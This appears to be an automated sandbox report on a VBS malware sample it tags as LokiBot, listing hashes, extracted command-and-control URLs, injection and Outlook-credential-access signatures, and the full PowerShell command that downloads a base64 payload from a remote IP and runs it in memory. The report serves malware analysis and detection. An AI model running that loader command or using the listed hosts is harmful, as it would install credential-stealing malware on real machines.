Analysis
-
max time kernel
132s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2022 13:55
Static task
static1
Behavioral task
behavioral1
Sample
DH0238999742.vbs
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
DH0238999742.vbs
Resource
win10v2004-20220901-en
General
-
Target
DH0238999742.vbs
-
Size
437KB
-
MD5
a28574570548d916d36ddfa0ab962548
-
SHA1
6b0da48289ca73aa1732d211544665ca5dcf6a25
-
SHA256
8b54fd4b6fd11853474de7367c7bde98e5472d20c8a04dbd2727f3884734f8ef
-
SHA512
a26bb1cb28ea4c68f9f7a7d96094b41c5dc56ce67ea4abe1ce26857c005c4e0f35a72494e458e4cf4a2aae53910e4b89d20bcf4f09116deef26fa64144930488
-
SSDEEP
48:kklC0eHz7/m7rJv4PsfbuUbNbbldQbWUSS/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldQbAMPKNrY4vvldI
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
lokibot
http://iklok.us/li/UN/cocacola.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 5048 powershell.exe 10 5048 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cvtres.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook cvtres.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cvtres.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 5048 set thread context of 1740 5048 powershell.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 5048 powershell.exe 5048 powershell.exe 1516 powershell.exe 1516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execvtres.exedescription pid process Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 1740 cvtres.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 5008 wrote to memory of 5048 5008 WScript.exe powershell.exe PID 5008 wrote to memory of 5048 5008 WScript.exe powershell.exe PID 5048 wrote to memory of 1516 5048 powershell.exe powershell.exe PID 5048 wrote to memory of 1516 5048 powershell.exe powershell.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe PID 5048 wrote to memory of 1740 5048 powershell.exe cvtres.exe -
outlook_office_path 1 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cvtres.exe -
outlook_win_path 1 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH0238999742.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.efil/tt/681.17.612.581//:ptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
memory/1516-135-0x0000000000000000-mapping.dmp
-
memory/1516-140-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmpFilesize
10.8MB
-
memory/1516-144-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmpFilesize
10.8MB
-
memory/1740-136-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1740-137-0x00000000004139DE-mapping.dmp
-
memory/1740-139-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1740-145-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/1740-146-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/5048-132-0x0000000000000000-mapping.dmp
-
memory/5048-141-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmpFilesize
10.8MB
-
memory/5048-134-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmpFilesize
10.8MB
-
memory/5048-133-0x00000248A5660000-0x00000248A5682000-memory.dmpFilesize
136KB